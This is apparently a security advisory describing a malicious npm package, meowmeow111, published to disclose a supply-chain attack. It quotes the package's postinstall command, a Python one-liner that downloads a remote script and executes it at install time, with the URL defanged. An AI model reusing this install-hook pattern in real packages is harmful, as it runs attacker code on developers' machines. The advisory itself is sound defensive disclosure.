LWA-2026-3959 confirmed malware
meowmeow111@1.0.0
Malicious code in meowmeow111 (npm)
T1195.002 · Compromise Software Supply ChainT1059.006 · PythonT1105 · Ingress Tool Transfer
Analysis
meowmeow111 is a bare delivery vehicle (package.json only, ~266 bytes, no code files) for remote code execution. Its postinstall script runs python3 -c "import urllib.request,os; exec(urllib.request.urlopen('hxxps://raw[.]githubusercontent[.]com/yourrepo/payload[.]py').read())" — fetching and executing Python from an external GitHub URL during npm install.
- analyzed by
- Leitwacht
- first seen
- Jun 10, 2026, 03:59 PM
- analyzed
- Jun 10, 2026, 03:59 PM
Related advisories
- meowmeow11001@1.0.0
- @ethers-js/contracts@6.9.0
- n8n-nodes-devops-utils@1.0.0
- txs-runner-lib@1.0.1
- txs-random-lib@1.0.1
- txs-builder@1.0.6
- node-fetch-utils@1.2.1
- anthropic-claude-latest@4.7.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.